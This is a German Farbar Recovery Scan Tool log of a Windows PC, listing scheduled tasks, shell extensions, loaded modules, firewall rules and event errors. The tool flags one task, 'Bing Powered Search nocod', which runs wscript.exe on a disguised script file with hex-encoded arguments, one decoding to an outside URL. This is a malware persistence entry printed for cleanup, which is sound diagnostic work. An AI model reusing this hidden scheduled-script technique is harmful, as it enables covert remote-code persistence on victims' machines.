ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2018-10-04] (Google)
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2018-06-15] (McAfee, Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2018-10-04] (Google)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2018-06-15] (McAfee, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {048FD072-7F98-4B21-82C8-BFE8E38E904A} - System32\Tasks\Bing Powered Search nocod => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442442d3830444543374646304231307d5c6669646f7361" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442 (Der Dateneintrag hat 78 mehr Zeichen). <==== ACHTUNG
Task: {12EB6DA2-4C4B-48E5-99D6-0917EB4F02DA} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {14005E01-FA72-4914-ABDC-954672515EF2} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {1B1101F4-DC82-4ED8-AF68-4AC641C96DAE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-07] (Google Inc.)
Task: {29BB56C9-7813-4F20-B6ED-721096C9B89D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-07] (Google Inc.)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {70F06EB7-FED0-4BE2-8E5B-31775CF4FA92} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {7B19520C-4083-438D-9084-D1575EC83544} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_pepper.exe [2018-10-10] (Adobe Systems Incorporated)
Task: {860CD76A-FE28-46BE-9F28-8A2A835C7244} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-10-24] (AVAST Software)
Task: {88278C44-7B40-4DA8-9E3B-E3EF1400E710} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {AD3A0291-20E0-47A4-8737-4D2B2B35CBA9} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2018-02-28] (McAfee, Inc.)
Task: {BCF90CA8-52B6-470A-9797-5AD9233DB22B} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2018-10-29] (AVAST Software)
Task: {E1C7E156-AD8B-4D0F-83A2-966C7A93EAC9} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe [2018-06-06] (McAfee, Inc.)
Task: {EAF62F53-52F6-413C-8394-451FABB2D0EE} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-10] (Adobe Systems Incorporated)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Bing Powered Search nocod.job => Wscript.exe C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt <==== ACHTUNG

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


ShortcutWithArgument: C:\Users\User\Desktop\Ben - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"
ShortcutWithArgument: C:\Users\User\Desktop\justa1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\User\Desktop\máta - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\User\Desktop\Profil 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2018-04-06 12:05 - 2018-04-06 12:05 - 000896136 _____ () C:\Program Files\Common Files\McAfee\CSP\2.9.175.0\McCSPMsgBusDLL.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-10-11 15:25 - 2018-09-20 04:38 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-07-11 09:31 - 2018-07-11 09:32 - 001922224 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2018-10-23 16:16 - 2018-10-23 16:18 - 000183808 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.33.41.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-10-23 16:16 - 2018-10-23 16:18 - 035118592 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe\Video.UI.exe
2018-10-23 16:16 - 2018-10-23 16:18 - 000290816 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe\SharedUI.dll
2018-10-23 16:16 - 2018-10-23 16:18 - 005987328 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe\EntCommon.dll
2017-09-26 11:05 - 2017-09-26 11:05 - 003553704 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-10-23 16:16 - 2018-10-23 16:18 - 009064448 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe\EntPlat.dll
2018-10-04 19:44 - 2018-10-04 19:44 - 046459080 _____ () C:\Program Files\Google\Drive\googledrivesync.exe
2018-11-11 21:32 - 2018-11-11 21:32 - 000113664 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_ctypes.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000080896 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\bz2.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 001792512 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_hashlib.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000128512 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32api.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000137728 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\pywintypes27.dll
2018-11-11 21:32 - 2018-11-11 21:32 - 000548864 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\pythoncom27.dll
2018-11-11 21:32 - 2018-11-11 21:32 - 000689664 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\unicodedata.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000438784 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32com.shell.shell.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 001489408 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\wx._core_.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 001007104 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\wx._gdi_.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 001039872 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\wx._windows_.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 001325056 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\wx._controls_.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000916992 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\wx._misc_.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 001084416 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\pysqlite2._sqlite.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000149504 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32file.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000136192 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32security.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000007680 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\hashobjs_ext.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000020992 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\thumbnails_ext.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000118784 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\usb_ext.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000047616 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_socket.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 002224640 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_ssl.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000014848 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\common.time34.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000023040 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32event.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000034304 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\windows.conditional.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000020480 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\windows.winwrap.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000110080 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\windows.volumes.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000223232 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32gui.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000173568 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_elementtree.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000169472 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\pyexpat.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000048128 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32inet.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000103424 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\wx._html2.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000046080 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_psutil_windows.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000633272 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\windows._cacheinvalidation.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000011776 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32crypt.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000301568 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\PIL._imaging.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000032256 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_multiprocessing.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 005752320 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\cello.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000026112 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\_yappi.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000044032 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32process.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000027648 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32pipe.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000010752 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\select.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000029696 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32pdh.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000038400 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\windows.connectivity.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000073216 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\windows.device_monitor.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000020480 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32profile.pyd
2018-11-11 21:32 - 2018-11-11 21:32 - 000026624 _____ () C:\Users\User\AppData\Local\Temp\_MEI86962\win32ts.pyd
2018-07-01 12:33 - 2018-07-01 12:33 - 005471232 _____ () C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUIDataModel.dll
2018-07-01 12:33 - 2018-07-01 12:33 - 000047616 _____ () C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUITelemetry.dll
2018-07-01 12:33 - 2018-07-01 12:33 - 005082112 _____ () C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUIViewModels.dll
2018-10-25 12:16 - 2018-10-23 22:24 - 005020504 _____ () C:\Program Files (x86)\Google\Chrome\Application\70.0.3538.77\libglesv2.dll
2018-10-25 12:16 - 2018-10-23 22:24 - 000116056 _____ () C:\Program Files (x86)\Google\Chrome\Application\70.0.3538.77\libegl.dll
2018-06-17 21:16 - 2018-06-17 21:17 - 067126928 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2018-10-24 14:33 - 2018-10-24 14:33 - 000598232 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-07-10 12:04 - 2018-10-16 06:21 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img0.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{B7C064A5-D3AA-4A61-96BD-0AFF6FA46E2B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\CastingStation.exe
FirewallRules: [{3BA05424-2C2D-4F7A-BA4F-D64D7554BD9E}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\Movie\PowerDVDMovie.exe
FirewallRules: [{2923B8DB-5682-4FC6-8BAB-CA11257941EB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\PowerDVD17Agent.exe
FirewallRules: [{F0675FDD-9AB4-449E-AA45-9A4C16DBC1F6}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\Kernel\DMS\CLMSServerPDVD17.exe
FirewallRules: [{7EC5855C-8CF6-4DEB-969B-5B7AD0CFF5DB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\PowerDVD.exe
FirewallRules: [{68DF603D-EFF4-46C5-8040-5B18171747EF}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe
FirewallRules: [{27BFD4C7-4FD6-425C-AB81-DCBB6669AF44}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe
FirewallRules: [{6CD716AD-3165-4369-AC0B-F77D89B6BF54}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{3D7E5A98-D714-40F4-B83E-ED9B0B8AB3A7}] => (Allow) C:\Users\User\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{81148400-9AEB-47BB-B049-47C499681228}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ED7307B7-6E3A-4824-9E76-D8BA052D7E87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D69EA6E7-3F1E-49BD-8712-F11901BE40D2}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
FirewallRules: [{59339258-6CB4-4309-BC05-DEDB1CCF7E79}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
FirewallRules: [{92502667-B57B-484F-8AA9-C5CDBF58501F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

23-09-2018 09:01:33 Geplanter Prüfpunkt
08-10-2018 18:11:44 Windows Update
08-11-2018 15:29:15 Windows Update

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (11/11/2018 09:05:38 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {41FD88F7-F295-4D39-91AC-A85F3149A05B} byla odmítnuta.

Error: (11/11/2018 09:05:38 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {95CABCC9-BC57-4C12-B8DF-BA193232AA01} byla odmítnuta.

Error: (11/11/2018 09:05:37 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {95CABCC9-BC57-4C12-B8DF-BA193232AA01} byla odmítnuta.

Error: (11/11/2018 09:05:35 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {41FD88F7-F295-4D39-91AC-A85F3149A05B} byla odmítnuta.

Error: (11/11/2018 09:05:35 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {41FD88F7-F295-4D39-91AC-A85F3149A05B} byla odmítnuta.

Error: (11/11/2018 09:05:35 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {41FD88F7-F295-4D39-91AC-A85F3149A05B} byla odmítnuta.

Error: (11/11/2018 09:05:30 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {95CABCC9-BC57-4C12-B8DF-BA193232AA01} byla odmítnuta.

Error: (11/11/2018 09:05:28 PM) (Source: COM) (EventID: 10031) (User: )
Description: Při zrušení zařazení vlastního zařazeného objektu byla provedena kontrola zásad zrušení zařazení a třída {95CABCC9-BC57-4C12-B8DF-BA193232AA01} byla odmítnuta.


Systemfehler:
=============
Error: (11/11/2018 10:11:31 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-A1GGGIV)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-A1GGGIV\User (SID: S-1-5-21-3294147820-2580206503-2443620995-1001) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/11/2018 09:42:20 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/11/2018 09:33:08 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-A1GGGIV)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-A1GGGIV\User (SID: S-1-5-21-3294147820-2580206503-2443620995-1001) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/11/2018 09:31:38 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/11/2018 09:16:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba SAService neuspěla při spuštění v důsledku následující chyby:
Systém nemůže nalézt uvedený soubor.

Error: (11/11/2018 09:05:49 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-A1GGGIV)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli DESKTOP-A1GGGIV\User (SID: S-1-5-21-3294147820-2580206503-2443620995-1001) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/11/2018 08:55:56 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/11/2018 04:07:23 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
